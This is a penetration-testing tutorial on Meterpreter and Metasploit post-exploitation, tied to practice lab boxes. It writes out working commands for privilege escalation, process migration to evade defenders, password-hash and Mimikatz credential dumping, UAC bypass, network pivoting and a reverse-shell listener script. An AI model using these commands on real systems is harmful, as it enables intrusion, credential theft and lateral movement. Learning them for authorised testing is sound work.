After the Session Opens
A session is the start, not the finish.
Now you gather information, climb to higher privileges, hide from defenders, and reach deeper into the network. Meterpreter and Metasploit’s post modules make each of those fast.
Core Meterpreter Moves
A handful of built-in commands cover most of the early post-exploitation work.
Is anyone home? Before you do anything noisy, check whether the user is at the keyboard:
meterpreter > idletime
User has been idle for: 9 mins 53 secs Idle means it’s safer to run things that might flash a window.
Climb to SYSTEM. getsystem tries several tricks to elevate automatically. It leans on the same token-abuse privileges you meet in Windows privilege escalation:
meterpreter > getuid
Server username: WKSTN\sam
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM It only works if your user holds a privilege like SeImpersonate or SeDebug. No magic, just automation of a manual technique.
Move house. Your Meterpreter runs inside a process. If that process dies, so does your access, and a process named met.exe is a gift to any defender scanning the list. migrate relocates your session into a trusted process.
meterpreter > ps # find a good host process
meterpreter > migrate 3912 # jump into it (e.g. OneDrive.exe)
[*] Migration completed successfully. You can also spawn a fresh hidden process and land in it, or dump local password hashes:
meterpreter > execute -H -f notepad # -H = hidden window
meterpreter > hashdump # dump the local SAM hashes Post-Exploitation Modules
Beyond the built-ins, Metasploit has hundreds of post modules. They take a live session as input via the SESSION option.
A common one: bypassing User Account Control to turn a medium-integrity admin shell into a high-integrity one:
msf6 > use exploit/windows/local/bypassuac_sdclt
msf6 exploit(...) > set SESSION 1
msf6 exploit(...) > set LHOST 10.10.14.5
msf6 exploit(...) > run You get a brand-new session, this time with full admin rights.
Kiwi is Mimikatz, loaded straight into Meterpreter. With SYSTEM, it pulls credentials out of memory:
meterpreter > load kiwi
meterpreter > creds_msv # LM and NTLM hashes
meterpreter > lsa_dump_sam # dump the SAM Those hashes feed straight back into the credential attacks you already know: crack them, or pass them.
Pivoting the Metasploit Way
The concepts of pivoting, why segmented networks stop you, and why the pivot dials home, live in the pivoting section. Metasploit has its own built-in version.
Add a route through a session, and internal Metasploit modules can suddenly reach the hidden subnet:
meterpreter > background
msf6 > use multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
msf6 post(multi/manage/autoroute) > run To use external tools through that route, stand up a SOCKS proxy and pair it with proxychains:
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set VERSION 5
msf6 auxiliary(server/socks_proxy) > run -j Or forward a single port to yourself with portfwd:
meterpreter > portfwd add -l 3389 -p 3389 -r 172.16.5.200 A catch worth remembering: routes only carry established connections, so a deeper target usually needs a bind payload (you connect in) rather than a reverse one (it can’t find its way back out).
This works, but for serious multi-hop pivoting a dedicated tool like ligolo-ng is far smoother.
Automating with Resource Scripts
Setting up the same listener by hand, every single time, gets old. A resource script is just a file of console commands Metasploit replays in order.
Save this as listener.rc:
use exploit/multi/handler
set PAYLOAD windows/meterpreter_reverse_https
set LHOST 10.10.14.5
set LPORT 443
set AutoRunScript post/windows/manage/migrate
set ExitOnSession false
run -z -j Two lines earn their keep:
AutoRunScriptruns a module the instant a session opens, here, auto-migrating so a killed process can’t cost you the shell.ExitOnSession falsekeeps the listener open for more connections instead of closing after the first.
Launch Metasploit straight into the script with -r:
Your listener is up, self-migrating, and ready for as many shells as arrive.
Metasploit even ships ready-made ones:
Read any script before you run it, and remember
setgsets an option globally across modules, handy for scripting a whole engagement’sLHOSTonce.
Practice Boxes
- Steel Mountain - TryHackMe. A Meterpreter foothold, then
getsystemand post modules to finish. A near-perfect fit for this note. - Grandpa - HackTheBox. Land Meterpreter on old IIS, then
migrateand elevate. - Optimum - HackTheBox. Foothold to full control on Windows, all the post-exploitation muscles.